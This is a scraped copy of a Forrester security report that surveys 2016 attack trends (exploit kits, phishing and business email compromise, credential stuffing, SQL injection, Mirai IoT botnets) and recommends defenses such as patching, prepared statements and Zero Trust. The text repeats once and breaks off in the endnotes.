Sunteți pe pagina 1din 17

PDF

English(EN)

For Security & Risk Professi

PDF

English(EN)
For Security & Risk Professionals
Top Cybersecurity Threats In 2017
Landscape: The Security Architecture And Operations Playbook
January 26, 2017
By Josh Zelonis with Stephanie Balaouras , Bill Barringham , Peggy Dostie

Table of Contents

S&R Pros Must Understand And Adapt To The Threat Landscape


RECOMMENDATIONS
Ensure That You Follow The Core Tenets Of Zero Trust
Supplemental Material
Why read this report
Security and risk (S&R) pros have the challenging task of using finite budgets to protect their
business from every possible attack type in the threat landscape. One strategy for approaching
this challenge is to use historical attack trends to prioritize protections against attacks that are the
most highly probable. This paper analyzes common attack patterns responsible for breaches in
2016 to facilitate this approach.
Key Takeaways
Malware Infection Cycle Drives Attack Trends
Accounts are compromised, sites are compromised, emails are sent, all of which is building up to
getting traffic to an exploit kit. Whether it be ransomware, banking malware, or command and
control, understanding how this malware infects your network will help you build a better
defense.
Assume Account Compromise
The law of averages dictates that the majority of users on the internet have had their credentials
compromised. Poor password hygiene on the part of your users makes this your problem.
The Internet Of Things Has Been Weaponized
The last few months of 2016 have brought us a new and powerful threat. Many people felt that
DDoS protection had been commoditized until an IoT botnet knocked out a DNS provider. Be
ready for the coming storm.
S&R PROS MUST UNDERSTAND AND ADAPT TO THE
THREAT LANDSCAPE
According to Forrester's Global Business Technographics Security Survey, 2016, an eye-
opening 49% of global network security decision-makers report that they experienced at least
one breach during the past 12 months. Of these respondents, 55% had suffered some manner of
internal incident involving their own employee or third-party business partner. Internal incidents
can involve employees who simply make poor decisions regarding the handling and use of the
firm's sensitive data or employees who have malicious intent. These malicious insiders can also
work in concert with external threat actors. Fifty-six percent of firms that suffered at least one
breach did so at the hands of external threat actors. To help S&R pros better defend against these
external attacks, we will identify and analyze the top methods of infiltration ( see Figure 1 ).
Figure 1: Common Types Of External Attack

No. 1: Exploit Kits, Getting To The Soft, Chewy Center Since 2006
Exploit kits contain prewritten code that targets vulnerabilities in software. Cybercriminals use a
variety of methods to redirect users to a compromised server hosting the exploit kit. The exploit
kit scans the user's browser or system for vulnerabilities and delivers malware. In the threat
ecosystem, software exploits are the wheels that make the bus go 'round and 'round. For years,
network penetration testers have promoted the concept that an exploit is a tool that
cybercriminals use to compromise one of your perimeter devices, escalate privileges, and move
laterally through your network. However, it's not about perimeter devices, it's about software.
This teaches a lesson that we should have learned 15 years ago from malware such as Nimda and
Code Red: You need to patch your systems and teach users not to open attachments from
strangers. Malware has evolved, and today it's important that S&R pros understand the
relationship between traffic generators and exploit kits so you can defend against attacks that
bypass your perimeter ( see Figure 2 ):
What you need to know: Traffic shapers drive users to exploit kit operators. Traffic
shapers are the ad impression generators of the criminal underground, and they live and
die by their ability to intelligently drive traffic to malware and exploit kit operators.
These are extremely advanced players who use software such as KeitaroTDS, which has
the ability to fingerprint systems for antivirus products before redirecting traffic to the
exploit kit. (see endnote 1) Common vectors for driving traffic include paying for ad
impressions from legitimate advertising networks (AKA malvertizing), compromising
legitimate systems to use as watering holes, and using stolen credentials to run spam
campaigns, which makes it extremely difficult and expensive to defend against.
What to do about it: Use threat intel with vulnerability management. As diverse as the
methods may be for gathering traffic, the entire business model behind ransomware and
credential-stealing malware such as Dridex relies on infection. This commonality is a
good place to start mounting your defenses. Combining threat intel to know what
vulnerabilities exploit kits are currently targeting, with a vulnerability management
solution that allows you to monitor which systems in your environment are vulnerable,
will put you in the driver's seat. In the case of ransomware, having a good backup and
recovery plan is also essential.
Figure 2: The Use Of Exploit Kits In Criminal Enterprise

No. 2: Social Engineering Demonstrates It's Just Easier To Attack Human Insecurity
Two of the biggest attack vectors we saw in 2016 were phishing attacks and business email
compromise (BEC). One of the reasons social engineering is so effective is that it preys on
human psychology. Factoring in the wealth of information people post on social media,
adversaries have everything they need to perform open source intelligence (OSINT) on us to
determine our likes and dislikes, job history, and relationship information, before leveraging it
against us. (see endnote 2) One example of an adversary doing just this was the Anthem breach,
where the attackers used LinkedIn profiles to identify high-value targets for phishing as the first
phase of the attack: (see endnote 3)
What you need to know: Users are quick to succumb to phishing and BEC attacks.
According to one study, 74% of targeted attack attempts use email as a vector. (see
endnote 4) This isn't 2000 where attackers own mail clients as soon as a user opens an
email, but it might as well be. The 2016 Verizon Data Breach Investigations Report
tracked over 8 million phishing simulations and found that 13% of recipients not only
opened the email but went on to click links or open attachments that would guarantee
infection. (see endnote 5) It's not just phishing attacks that use email as a threat vector.
BEC is a form of social engineering that follows the general story arc of someone posing
as the CEO who asks an employee to pay an invoice, and the helpful employee goes
about doing it. The United States Federal Bureau of Investigation estimates that BEC has
cost companies $3.1 billion between October 2013 and May 2016, when the report was
published. (see endnote 6)
What do about it: Train employees to spot these attacks. Education and phishing
simulations may help raise user awareness to reduce the effectiveness of phishing
campaigns, but experience shows that this isn't a total solution. Understanding that this
class of attack targets an individual, you also need to harden business processes for
transactions involving money or critical data to empower your staff to ask questions and
eliminate this risk.
No 3: Credential Stuffing, Or How Someone Else's Breach Hurts You
There are approximately 3.5 billion internet users worldwide. (see endnote 7) As the number of
internet users has grown, so too has the scale of data breaches: Many breaches of the past several
years broke the 100 million customer record barrier (e.g., Home Depot, Yahoo). In the case of
Yahoo, which suffered a compromise of 1 billion customer records, that's over 28%, almost one-
third of all internet users. (see endnote 8) The majority of people on the internet have had their
credentials compromised at least once. Here's the stark reality: Dropbox was compromised with
an employee's credentials that attackers had stolen in a LinkedIn breach: (see endnote 9)
What you need to know: Stolen credentials represent a reputational risk to you. There are
a number of ways cybercriminals can monetize stolen credentials that aren't immediately
obvious. Loyalty fraud is becoming extremely popular and profitable, with 72% of
loyalty program managers reporting fraud-related issues. (see endnote 10) According to
The Points Guy, points are worth a cent or two each, and one can cash them out for
anything from gift cards to resort stays. (see endnote 11) The fact that it's a lot easier to
launder points than money stolen from banking fraud makes this an attractive business
model. Unfortunately, this could turn your loyalty program into a customer experience
nightmare.
What to do about it: Incorporate threat intel with user behavior analytics. There are
essentially two challenges that phishers/spammers have to overcome: They have to hit
your inbox and then get a click. An established identity and reputation are two key factors
marketing firms use to get their messages into your inbox. By leveraging compromised
accounts, criminals are playing the same game with less restraint. Companies like
Emailage and Threatmetrix attempt to help the enterprise by developing user reputation
scores based on everything from account age to social media score. The problem is that
the subset of users who have suffered a breach of their information is so high that S&R
pros need to understand that the account is not necessarily the same user ( see Figure 3 ).
Thus, it's important to use technologies such as security user behavior analytics to
monitor for suspicious activity. (see endnote 12)
Figure 3: Top Breaches As A Percentage Of Worldwide Internet Users

No. 4: The Web Application Paradigm


Web application attacks are a major part of the malware ecosystem we described earlier. Traffic
distribution networks require legitimate traffic to route and somewhere to host the exploit kit.
Your site may be attractive for indirect reasons you haven't yet thought of:
What you need to know: You are infecting your customers right now. In 1984, Ken
Thompson wrote a paper titled "Reflections on Trusting Trust" detailing the risk of
trusting third-party code. (see endnote 13) These days, we're loading remote JavaScript
libraries, trackers, and fonts, and then trusting ad companies to provide safe content for
our users. You need to be accountable for everything you load when a visitor comes to
your site. The New York Times, BBC, MSN, Xfinity, and the NFL have all been hit with
malvertising campaigns, becoming infection vectors for their customers. (see endnote 14)
In the future, expect cybercriminals to combine the same strategy behind malvertising
with strategic compromises of sites hosting other code you are loading to turn your site
into a watering hole. For years, we have implored organizations to stop loading code
from remote websites. Now is the time to stop.
What you need to do about it: Like polio, it's time to eradicate SQL injection. SQL
injection, a pernicious web application attack, allows remote command execution and
exfiltration of the contents of your database via your web application. Unfortunately,
SQL injection is still responsible for almost half of all web attacks detected by Akamai.
(see endnote 15) There is a solution that is 100% effective in the prevention of SQL
injection; security pros must ensure that app developers use prepared statements, which
handle user input as a parameter instead of a dynamic part of a SQL statement. DevOps
methodologies are increasing the pace of app releases, straining security teams at a time
when their expertise is already scarce. Security pros must join with developers and
operations pros in DevOps practices or lose out on the opportunity to systematically
improve application security. (see endnote 16)
No. 5: Cybercriminals Have Weaponized The Internet Of Things (IoT)
Gone are the days of mom and pop botnets consisting of unpatched AOL users. There was a
major escalation in the DDoS arms race this year as cybercriminals released code for Mirai, an
IoT worm, after a record-breaking proof of capability against Brian Krebs' blog site. (see endnote
17) Cybercriminals have continuously iterated on this same code and used it in increasingly
damaging attacks in the last few months of 2016 ( see Figure 4 ). (see endnote 18) We are now
living in the dystopian IoT future we have feared:
What you need to know: Mirai is a fully armed and operational DDoS battle station.
Initial variants of Mirai relied on a default credential list to access security cameras and
digital video recorders (DVRs), but cybercriminals have armed the latest variant with
exploit code targeting home DSL routers. (see endnote 19) This is significant because it's
the start of a trend toward more-sophisticated attacks, which greatly increases the number
of devices that they can infect. Keep in mind that for all its destructive capabilities, Mirai
is still the little cousin to Bashlight, which is known to have infected about a million
devices. (see endnote 20) Developments such as this are only one sign of things to come
as cybercriminals have made significant investments into infrastructure to add resilience
to this dangerous botnet. (see endnote 21)
What you need to do: Prepare for IoT ransomware. In August, security researchers
demonstrated a ransomware strain that attacked an IoT thermostat, turning the
temperature up to 99 degrees Fahrenheit and locking the device with a cryptocode. (see
endnote 22) While traditional ransomware is an extortion play based on denying the user
access to their data, IoT offers a lot of new and exciting opportunities for making your
targets miserable and putting them in physical harm. As people are exploring the
potential for ransomware targeting vehicles, operational technologies, and even medical
equipment, it's essential to have a plan for how your organization will resolve these
issues. One challenge to IoT devices is you can't load traditional endpoint protections on
them due to device constraints. Look to leverage Zero Trust to segment and limit the IoT
attack surface. (see endnote 23)
Figure 4: The Mirai 2016 Timeline

RECOMMENDATIONS
Ensure That You Follow The Core Tenets Of Zero Trust
Zero Trust is a fundamental rethinking of corporate security from a failed, perimeter-centric
approach to one that is data-centric and more appropriate for digital businesses (where S&R pros
have far less control over networks, endpoints, IoT devices, apps, and people). Three concepts
underpin Zero Trust. S&R pros must: 1) verify and secure all resources and data assets regardless
of location; 2) limit and strictly enforce access control across all user populations,
devices/channels, and hosting models; and 3) continuously log and inspect all traffic, both
internal and external. Heading into 2017, we recommend that S&R pros:
Ensure your vulnerability management solution provides endpoint visibility. To
understand risk exposure, it's not enough to perform external scans of systems,
particularly user systems. Attackers aren't gaining access through exposed network
services, but though the software your users read email, surf the web, and open
documents with.
Employ user behavior analytics algorithms to your customer base for fraud detection. In a
world rife with password reuse and frequent data breaches, credential stuffing is an
immediate concern. You need to be able to detect when good users suddenly go bad as an
indication of compromise in order to limit financial and reputational damage.
Make sure you're covered for DDoS. There's been major escalation in DDoS capabilities,
and your current coverage may no longer be sufficient in this new age of IoT botnets.
Review your DDoS mitigation strategies, and talk to critical third-party service providers
to ensure they're prepared as well.
SUPPLEMENTAL MATERIAL
Survey Methodology
Forrester collaborated with CyberFactors to obtain the data in this report. The data may contain
publicly available information and/or proprietary data collected by CyberFactors. The analysis of
the data is exclusively Forrester's. More information about CyberFactors is available at
cyberfactors.com.
Forrester's Global Business Technographics Security Survey, 2016, was fielded in March to May
2016. This online survey included 3,588 respondents in Australia, Brazil, Canada, China, France,
Germany, India, New Zealand, the UK, and the US from companies with two or more
employees.
Forrester's Business Technographics ensures that the final survey population contains only those
with significant involvement in the planning, funding, and purchasing of business and
technology products and services. Research Now fielded this survey on behalf of Forrester.
Survey respondent incentives include points redeemable for gift certificates.
ENDNOTES
1. Source: Ed Miles, "A Case Of Keitaro (featuring RIG And Nuclear)," Zscaler blog,
February 29, 2016 (http://www.zscaler.com/blogs/research/case-keitaro-featuring-rig-
and-nuclear).
"Back to text"
2. See the Forrester report " Four Ways Cybercriminals Exploit Social Media. "
"Back to text"
3. Source: Joanna Belbey, "Beware Of Social Media And Cybersecurity," Forbes, February
29, 2016 (http://www.forbes.com/sites/joannabelbey/2016/02/29/beware-of-social-media-
and-cybersecurity/2/#7c14499a182a).
"Back to text"
4. Source: "Spear Phishing 101: What is Spear Phishing?" Trend Micro, September 24,
2015 (http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/spear-phishing-
101-what-is-spear-phishing).
"Back to text"
5. Source: "Verizon's 2016 Data Breach Investigations Report," Verizon, 2016
(http://www.verizonenterprise.com/verizon-insights-lab/dbir/2016/).
"Back to text"
6. Source: "Business E-Mail Compromise: The 3.1 Billion Dollar Scam," Internet Crime
Complaint Center, June 14, 2016 (http://www.ic3.gov/media/2016/160614.aspx).
"Back to text"
7. Source: "Internet Users," Internet Live Stats (http://www.internetlivestats.com/internet-
users/).
"Back to text"
8. Source: Robert Mcmillan, Ryan Knutson, and Deepa Seetharaman, "Yahoo Discloses
New Breach of 1 Billion User Accounts," The Wall Street Journal, December 15, 2016
(http://www.wsj.com/articles/yahoo-discloses-new-breach-of-1-billion-user-accounts-
1481753131).
"Back to text"
9. Source: Kate Conger and Matthew Lynley, "Dropbox employee's password reuse led to
theft of 60M+ user credentials," TechCrunch, August 30, 2016
(http://techcrunch.com/2016/08/30/dropbox-employees-password-reuse-led-to-theft-of-
60m-user-credentials/).
"Back to text"
10. Source: Mike McDonnell, "Loyalty Fraud: A Rising Threat to Consumers and
Businesses," 1to1 Media blog, March 11, 2016 (http://www.1to1media.com/customer-
loyalty/loyalty-fraud-rising-threat-consumers-and-businesses).
"Back to text"
11. Source: "What Are Points & Miles Worth? November Monthly Valuations," The Points
Guy, November 2, 2016 (http://thepointsguy.com/2016/11/november-2016-monthly-
valuations).
"Back to text"
12. See the Forrester report " Vendor Landscape: Security User Behavior Analytics
(SUBA). "
"Back to text"
13. Source: Ken Thompson, "Reflections on trusting trust," ACM Digital Library, August 8,
1984 (http://dl.acm.org/citation.cfm?id=358210).
"Back to text"
14. Source: Jrme Segura, "Large Angler Malvertising Campaign Hits Top Publishers,"
Malwarebytes Labs, March 15, 2016 (http://blog.malwarebytes.com/threat-
analysis/2016/03/large-angler-malvertising-campaign-hits-top-publishers).
"Back to text"
15. Source: "Q3 State of the Internet / Security Report," Akamai
(http://content.akamai.com/pg7407-soti-security-report-q3-en.html).
"Back to text"
16. See the Forrester report " Secure Applications At The Speed Of DevOps. "
"Back to text"
17. Source: Brian Krebs, "Source Code for IoT Botnet Mirai' Released," Krebs on Security,
October 16, 2016 (https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-
released/).
"Back to text"
18. Source: Waqas Amir, "Akamai Kicks off Brian Krebs from its network after 665 Gbps
DDoS attack," HackRead, September 23, 2016 (http://www.hackread.com/brian-krebs-
665-gbps-ddos-attack-akamai/); Eduard Kovacs, "Hosting Provider OVH Hit by 1 Tbps
DDoS Attack," SecurityWeek, September 23, 2016
(http://www.securityweek.com/hosting-provider-ovh-hit-1-tbps-ddos-attack); Brian
Krebs, "Source Code for IoT Botnet Mirai' Released," Krebs on Security, October 16,
2016 (https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/);
Scott Hilton, "Dyn Analysis Summary Of Friday October 21 Attack," Dyn, October 26,
2016 (https://dyn.com/blog/dyn-analysis-summary-of-friday-october-21-attack/); Kevin
Beaumont, "Shadows Kill' Mirai DDoS botnet testing large scale attacks, sending
threatening messages about UK and attacking researchers," Medium, November 3, 2016
(https://medium.com/@networksecurity/shadows-kill-mirai-ddos-botnet-testing-large-
scale-attacks-sending-threatening-messages-about-6a61553d1c7#.3ief6l178); "Eir D1000
Wireless Router - WAN Side Remote Command Injection (Metasploit)," Exploit
Database, November 8, 2016 (https://www.exploit-db.com/exploits/40740/); Dan Goodin,
"Newly discovered router flaw being hammered by in-the-wild attacks," Ars Technica,
November 29, 2016 (http://arstechnica.com/security/2016/11/notorious-iot-botnets-
weaponize-new-flaw-found-in-millions-of-home-routers/); Graeme Burton, "TalkTalk
and Post Office routers downed in Mirai botnet attack," The Inquirer, December 2, 2016
(http://www.theinquirer.net/inquirer/news/2478916/talktalk-and-post-office-routers-
downed-in-mirai-botnet-attack); Liu Ya, "Now Mirai Has DGA Feature Built in,"
Network Security Research Lab at 360, December 9, 2016
(http://blog.netlab.360.com/new-mirai-variant-with-dga/); and Catalin Cimpanu,
"Security Firms Almost Brought Down Massive Mirai Botnet," BleepingComputer,
December 16, 2016 (http://www.bleepingcomputer.com/news/security/security-firms-
almost-brought-down-massive-mirai-botnet/).
"Back to text"
19. Source: John Leyden, "Sh... IoT just got real: Mirai botnet attacks targeting multiple
ISPs," The Register, December 2, 2016
(http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/).
"Back to text"
20. Source: Dan Goodin, "Brace yourselvessource code powering potent IoT DDoSes just
went public," Ars Technica, October 3, 2016
(http://arstechnica.com/security/2016/10/brace-yourselves-source-code-powering-potent-
iot-ddoses-just-went-public/).
"Back to text"
21. Source: Brian Krebs, "New Mirai Worm Knocks 900K Germans Offline," Krebs on
Security, November 16, 2016 (http://krebsonsecurity.com/2016/11/new-mirai-worm-
knocks-900k-germans-offline/).
"Back to text"
22. Source: Darlene Storm, "Hackers demonstrated first ransomware for IoT thermostats at
DEF CON," Computerworld, August 8, 2016
(http://www.computerworld.com/article/3105001/security/hackers-demonstrated-first-
ransomware-for-iot-thermostats-at-def-con.html).
"Back to text"
23. See the Forrester report " The IoT Attack Surface Transcends The Digital-Physical
Divide. "
"Back to text"
2017, Forrester Research, Inc. and/or its subsidiaries. All rights reserved.
onals
Top Cybersecurity Threats In 2017
Landscape: The Security Architecture And Operations Playbook
January 26, 2017
By Josh Zelonis with Stephanie Balaouras , Bill Barringham , Peggy Dostie

Table of Contents

S&R Pros Must Understand And Adapt To The Threat Landscape


RECOMMENDATIONS
Ensure That You Follow The Core Tenets Of Zero Trust
Supplemental Material
Why read this report
Security and risk (S&R) pros have the challenging task of using finite budgets to protect their
business from every possible attack type in the threat landscape. One strategy for approaching
this challenge is to use historical attack trends to prioritize protections against attacks that are the
most highly probable. This paper analyzes common attack patterns responsible for breaches in
2016 to facilitate this approach.
Key Takeaways
Malware Infection Cycle Drives Attack Trends
Accounts are compromised, sites are compromised, emails are sent, all of which is building up to
getting traffic to an exploit kit. Whether it be ransomware, banking malware, or command and
control, understanding how this malware infects your network will help you build a better
defense.
Assume Account Compromise
The law of averages dictates that the majority of users on the internet have had their credentials
compromised. Poor password hygiene on the part of your users makes this your problem.
The Internet Of Things Has Been Weaponized
The last few months of 2016 have brought us a new and powerful threat. Many people felt that
DDoS protection had been commoditized until an IoT botnet knocked out a DNS provider. Be
ready for the coming storm.
S&R PROS MUST UNDERSTAND AND ADAPT TO THE
THREAT LANDSCAPE
According to Forrester's Global Business Technographics Security Survey, 2016, an eye-
opening 49% of global network security decision-makers report that they experienced at least
one breach during the past 12 months. Of these respondents, 55% had suffered some manner of
internal incident involving their own employee or third-party business partner. Internal incidents
can involve employees who simply make poor decisions regarding the handling and use of the
firm's sensitive data or employees who have malicious intent. These malicious insiders can also
work in concert with external threat actors. Fifty-six percent of firms that suffered at least one
breach did so at the hands of external threat actors. To help S&R pros better defend against these
external attacks, we will identify and analyze the top methods of infiltration ( see Figure 1 ).
Figure 1: Common Types Of External Attack

No. 1: Exploit Kits, Getting To The Soft, Chewy Center Since 2006
Exploit kits contain prewritten code that targets vulnerabilities in software. Cybercriminals use a
variety of methods to redirect users to a compromised server hosting the exploit kit. The exploit
kit scans the user's browser or system for vulnerabilities and delivers malware. In the threat
ecosystem, software exploits are the wheels that make the bus go 'round and 'round. For years,
network penetration testers have promoted the concept that an exploit is a tool that
cybercriminals use to compromise one of your perimeter devices, escalate privileges, and move
laterally through your network. However, it's not about perimeter devices, it's about software.
This teaches a lesson that we should have learned 15 years ago from malware such as Nimda and
Code Red: You need to patch your systems and teach users not to open attachments from
strangers. Malware has evolved, and today it's important that S&R pros understand the
relationship between traffic generators and exploit kits so you can defend against attacks that
bypass your perimeter ( see Figure 2 ):
What you need to know: Traffic shapers drive users to exploit kit operators. Traffic
shapers are the ad impression generators of the criminal underground, and they live and
die by their ability to intelligently drive traffic to malware and exploit kit operators.
These are extremely advanced players who use software such as KeitaroTDS, which has
the ability to fingerprint systems for antivirus products before redirecting traffic to the
exploit kit. (see endnote 1) Common vectors for driving traffic include paying for ad
impressions from legitimate advertising networks (AKA malvertizing), compromising
legitimate systems to use as watering holes, and using stolen credentials to run spam
campaigns, which makes it extremely difficult and expensive to defend against.
What to do about it: Use threat intel with vulnerability management. As diverse as the
methods may be for gathering traffic, the entire business model behind ransomware and
credential-stealing malware such as Dridex relies on infection. This commonality is a
good place to start mounting your defenses. Combining threat intel to know what
vulnerabilities exploit kits are currently targeting, with a vulnerability management
solution that allows you to monitor which systems in your environment are vulnerable,
will put you in the driver's seat. In the case of ransomware, having a good backup and
recovery plan is also essential.
Figure 2: The Use Of Exploit Kits In Criminal Enterprise

No. 2: Social Engineering Demonstrates It's Just Easier To Attack Human Insecurity
Two of the biggest attack vectors we saw in 2016 were phishing attacks and business email
compromise (BEC). One of the reasons social engineering is so effective is that it preys on
human psychology. Factoring in the wealth of information people post on social media,
adversaries have everything they need to perform open source intelligence (OSINT) on us to
determine our likes and dislikes, job history, and relationship information, before leveraging it
against us. (see endnote 2) One example of an adversary doing just this was the Anthem breach,
where the attackers used LinkedIn profiles to identify high-value targets for phishing as the first
phase of the attack: (see endnote 3)
What you need to know: Users are quick to succumb to phishing and BEC attacks.
According to one study, 74% of targeted attack attempts use email as a vector. (see
endnote 4) This isn't 2000 where attackers own mail clients as soon as a user opens an
email, but it might as well be. The 2016 Verizon Data Breach Investigations Report
tracked over 8 million phishing simulations and found that 13% of recipients not only
opened the email but went on to click links or open attachments that would guarantee
infection. (see endnote 5) It's not just phishing attacks that use email as a threat vector.
BEC is a form of social engineering that follows the general story arc of someone posing
as the CEO who asks an employee to pay an invoice, and the helpful employee goes
about doing it. The United States Federal Bureau of Investigation estimates that BEC has
cost companies $3.1 billion between October 2013 and May 2016, when the report was
published. (see endnote 6)
What do about it: Train employees to spot these attacks. Education and phishing
simulations may help raise user awareness to reduce the effectiveness of phishing
campaigns, but experience shows that this isn't a total solution. Understanding that this
class of attack targets an individual, you also need to harden business processes for
transactions involving money or critical data to empower your staff to ask questions and
eliminate this risk.
No 3: Credential Stuffing, Or How Someone Else's Breach Hurts You
There are approximately 3.5 billion internet users worldwide. (see endnote 7) As the number of
internet users has grown, so too has the scale of data breaches: Many breaches of the past several
years broke the 100 million customer record barrier (e.g., Home Depot, Yahoo). In the case of
Yahoo, which suffered a compromise of 1 billion customer records, that's over 28%, almost one-
third of all internet users. (see endnote 8) The majority of people on the internet have had their
credentials compromised at least once. Here's the stark reality: Dropbox was compromised with
an employee's credentials that attackers had stolen in a LinkedIn breach: (see endnote 9)
What you need to know: Stolen credentials represent a reputational risk to you. There are
a number of ways cybercriminals can monetize stolen credentials that aren't immediately
obvious. Loyalty fraud is becoming extremely popular and profitable, with 72% of
loyalty program managers reporting fraud-related issues. (see endnote 10) According to
The Points Guy, points are worth a cent or two each, and one can cash them out for
anything from gift cards to resort stays. (see endnote 11) The fact that it's a lot easier to
launder points than money stolen from banking fraud makes this an attractive business
model. Unfortunately, this could turn your loyalty program into a customer experience
nightmare.
What to do about it: Incorporate threat intel with user behavior analytics. There are
essentially two challenges that phishers/spammers have to overcome: They have to hit
your inbox and then get a click. An established identity and reputation are two key factors
marketing firms use to get their messages into your inbox. By leveraging compromised
accounts, criminals are playing the same game with less restraint. Companies like
Emailage and Threatmetrix attempt to help the enterprise by developing user reputation
scores based on everything from account age to social media score. The problem is that
the subset of users who have suffered a breach of their information is so high that S&R
pros need to understand that the account is not necessarily the same user ( see Figure 3 ).
Thus, it's important to use technologies such as security user behavior analytics to
monitor for suspicious activity. (see endnote 12)
Figure 3: Top Breaches As A Percentage Of Worldwide Internet Users

No. 4: The Web Application Paradigm


Web application attacks are a major part of the malware ecosystem we described earlier. Traffic
distribution networks require legitimate traffic to route and somewhere to host the exploit kit.
Your site may be attractive for indirect reasons you haven't yet thought of:
What you need to know: You are infecting your customers right now. In 1984, Ken
Thompson wrote a paper titled "Reflections on Trusting Trust" detailing the risk of
trusting third-party code. (see endnote 13) These days, we're loading remote JavaScript
libraries, trackers, and fonts, and then trusting ad companies to provide safe content for
our users. You need to be accountable for everything you load when a visitor comes to
your site. The New York Times, BBC, MSN, Xfinity, and the NFL have all been hit with
malvertising campaigns, becoming infection vectors for their customers. (see endnote 14)
In the future, expect cybercriminals to combine the same strategy behind malvertising
with strategic compromises of sites hosting other code you are loading to turn your site
into a watering hole. For years, we have implored organizations to stop loading code
from remote websites. Now is the time to stop.
What you need to do about it: Like polio, it's time to eradicate SQL injection. SQL
injection, a pernicious web application attack, allows remote command execution and
exfiltration of the contents of your database via your web application. Unfortunately,
SQL injection is still responsible for almost half of all web attacks detected by Akamai.
(see endnote 15) There is a solution that is 100% effective in the prevention of SQL
injection; security pros must ensure that app developers use prepared statements, which
handle user input as a parameter instead of a dynamic part of a SQL statement. DevOps
methodologies are increasing the pace of app releases, straining security teams at a time
when their expertise is already scarce. Security pros must join with developers and
operations pros in DevOps practices or lose out on the opportunity to systematically
improve application security. (see endnote 16)
No. 5: Cybercriminals Have Weaponized The Internet Of Things (IoT)
Gone are the days of mom and pop botnets consisting of unpatched AOL users. There was a
major escalation in the DDoS arms race this year as cybercriminals released code for Mirai, an
IoT worm, after a record-breaking proof of capability against Brian Krebs' blog site. (see endnote
17) Cybercriminals have continuously iterated on this same code and used it in increasingly
damaging attacks in the last few months of 2016 ( see Figure 4 ). (see endnote 18) We are now
living in the dystopian IoT future we have feared:
What you need to know: Mirai is a fully armed and operational DDoS battle station.
Initial variants of Mirai relied on a default credential list to access security cameras and
digital video recorders (DVRs), but cybercriminals have armed the latest variant with
exploit code targeting home DSL routers. (see endnote 19) This is significant because it's
the start of a trend toward more-sophisticated attacks, which greatly increases the number
of devices that they can infect. Keep in mind that for all its destructive capabilities, Mirai
is still the little cousin to Bashlight, which is known to have infected about a million
devices. (see endnote 20) Developments such as this are only one sign of things to come
as cybercriminals have made significant investments into infrastructure to add resilience
to this dangerous botnet. (see endnote 21)
What you need to do: Prepare for IoT ransomware. In August, security researchers
demonstrated a ransomware strain that attacked an IoT thermostat, turning the
temperature up to 99 degrees Fahrenheit and locking the device with a cryptocode. (see
endnote 22) While traditional ransomware is an extortion play based on denying the user
access to their data, IoT offers a lot of new and exciting opportunities for making your
targets miserable and putting them in physical harm. As people are exploring the
potential for ransomware targeting vehicles, operational technologies, and even medical
equipment, it's essential to have a plan for how your organization will resolve these
issues. One challenge to IoT devices is you can't load traditional endpoint protections on
them due to device constraints. Look to leverage Zero Trust to segment and limit the IoT
attack surface. (see endnote 23)
Figure 4: The Mirai 2016 Timeline

RECOMMENDATIONS
Ensure That You Follow The Core Tenets Of Zero Trust
Zero Trust is a fundamental rethinking of corporate security from a failed, perimeter-centric
approach to one that is data-centric and more appropriate for digital businesses (where S&R pros
have far less control over networks, endpoints, IoT devices, apps, and people). Three concepts
underpin Zero Trust. S&R pros must: 1) verify and secure all resources and data assets regardless
of location; 2) limit and strictly enforce access control across all user populations,
devices/channels, and hosting models; and 3) continuously log and inspect all traffic, both
internal and external. Heading into 2017, we recommend that S&R pros:
Ensure your vulnerability management solution provides endpoint visibility. To
understand risk exposure, it's not enough to perform external scans of systems,
particularly user systems. Attackers aren't gaining access through exposed network
services, but though the software your users read email, surf the web, and open
documents with.
Employ user behavior analytics algorithms to your customer base for fraud detection. In a
world rife with password reuse and frequent data breaches, credential stuffing is an
immediate concern. You need to be able to detect when good users suddenly go bad as an
indication of compromise in order to limit financial and reputational damage.
Make sure you're covered for DDoS. There's been major escalation in DDoS capabilities,
and your current coverage may no longer be sufficient in this new age of IoT botnets.
Review your DDoS mitigation strategies, and talk to critical third-party service providers
to ensure they're prepared as well.
SUPPLEMENTAL MATERIAL
Survey Methodology
Forrester collaborated with CyberFactors to obtain the data in this report. The data may contain
publicly available information and/or proprietary data collected by CyberFactors. The analysis of
the data is exclusively Forrester's. More information about CyberFactors is available at
cyberfactors.com.
Forrester's Global Business Technographics Security Survey, 2016, was fielded in March to May
2016. This online survey included 3,588 respondents in Australia, Brazil, Canada, China, France,
Germany, India, New Zealand, the UK, and the US from companies with two or more
employees.
Forrester's Business Technographics ensures that the final survey population contains only those
with significant involvement in the planning, funding, and purchasing of business and
technology products and services. Research Now fielded this survey on behalf of Forrester.
Survey respondent incentives include points redeemable for gift certificates.
ENDNOTES
1. Source: Ed Miles, "A Case Of Keitaro (featuring RIG And Nuclear)," Zscaler blog,
February 29, 2016 (http://www.zscaler.com/blogs/research/case-keitaro-featuring-rig-
and-nuclear).
"Back to text"
2. See the Forrester report " Four Ways Cybercriminals Exploit Social Media. "
"Back to text"
3. Source: Joanna Belbey, "Beware Of Social Media And Cybersecurity," Forbes, February
29, 2016 (http://www.forbes.com/sites/joannabelbey/2016/02/29/beware-of-social-media-
and-cybersecurity/2/#7c14499a182a).
"Back to text"
4. Source: "Spear Phishing 101: What is Spear Phishing?" Trend Micro, September 24,
2015 (http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/spear-phishing-
101-what-is-spear-phishing).
"Back to text"
5. Source: "Verizon's 2016 Data Breach Investigations Report," Verizon, 2016
(http://www.verizonenterprise.com/verizon-insights-lab/dbir/2016/).
"Back to text"
6. Source: "Business E-Mail Compromise: The 3.1 Billion Dollar Scam," Internet Crime
Complaint Center, June 14, 2016 (http://www.ic3.gov/media/2016/160614.aspx).
"Back to text"
7. Source: "Internet Users," Internet Live Stats (http://www.internetlivestats.com/internet-
users/).
"Back to text"
8. Source: Robert Mcmillan, Ryan Knutson, and Deepa Seetharaman, "Yahoo Discloses
New Breach of 1 Billion User Accounts," The Wall Street Journal, December 15, 2016
(http://www.wsj.com/articles/yahoo-discloses-new-breach-of-1-billion-user-accounts-
1481753131).
"Back to text"
9. Source: Kate Conger and Matthew Lynley, "Dropbox employee's password reuse led to
theft of 60M+ user credentials," TechCrunch, August 30, 2016
